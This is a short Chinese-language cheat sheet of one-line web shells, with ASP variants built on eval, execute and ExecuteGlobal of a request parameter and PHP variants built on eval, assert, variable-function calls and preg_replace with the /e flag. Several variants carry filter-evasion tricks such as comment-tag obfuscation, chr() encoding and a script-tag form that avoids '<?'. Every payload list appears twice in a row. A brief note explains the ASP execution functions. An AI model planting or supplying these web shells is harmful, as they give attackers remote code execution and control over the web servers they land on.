asp一句话木马
<%eval request("sb")%>
<%execute request("sb")%>
<%execute(request("sb"))%>
<%execute request("sb")%><%'<%loop <%:%>
<%'<%loop <%:%><%execute request("sb")%>
%><%Eval(Request(chr(35)))%><%
<%ExecuteGlobal request("sb")%>
<%if request("sb")<>"" Then execute(request("sb"))%>
<%@ Page Language="Jscript"%>
<%eval request("sb")%>
<%execute request("sb")%>
<%execute(request("sb"))%>
<%execute request("sb")%><%'<%loop <%:%>
<%'<%loop <%:%><%execute request("sb")%>
%><%Eval(Request(chr(35)))%><%
<%ExecuteGlobal request("sb")%>
<%if request("sb")<>"" Then execute(request("sb"))%>
<%@ Page Language="Jscript"%>
补充知识:
asp代码执行漏洞:
Eval函数接受一个包含VBScript表达式的字符串自变量,求出这个表达式的值并返回结果
Execute和ExecuteGlobal函数接受一个包含ASP代码的字符串。
Execute和ExecuteGlobal函数接受一个包含ASP代码的字符串。
php一句话木马
<?php eval($_POST[sb])?>
<?php @eval($_POST[sb])?> //容错代码
<?php assert($_POST[sb]);?>
<?$_POST['sa']($_POST['sb']);?>
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
<?php @preg_replace("/[emai]/e",$_POST['h'],"error");?>
<script language="php">@eval($_POST[sb])</script> //绕过<?
<?php eval($_POST[sb])?>
<?php @eval($_POST[sb])?> //容错代码
<?php assert($_POST[sb]);?>
<?$_POST['sa']($_POST['sb']);?>
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
<?php @preg_replace("/[emai]/e",$_POST['h'],"error");?>
<script language="php">@eval($_POST[sb])</script> //绕过<?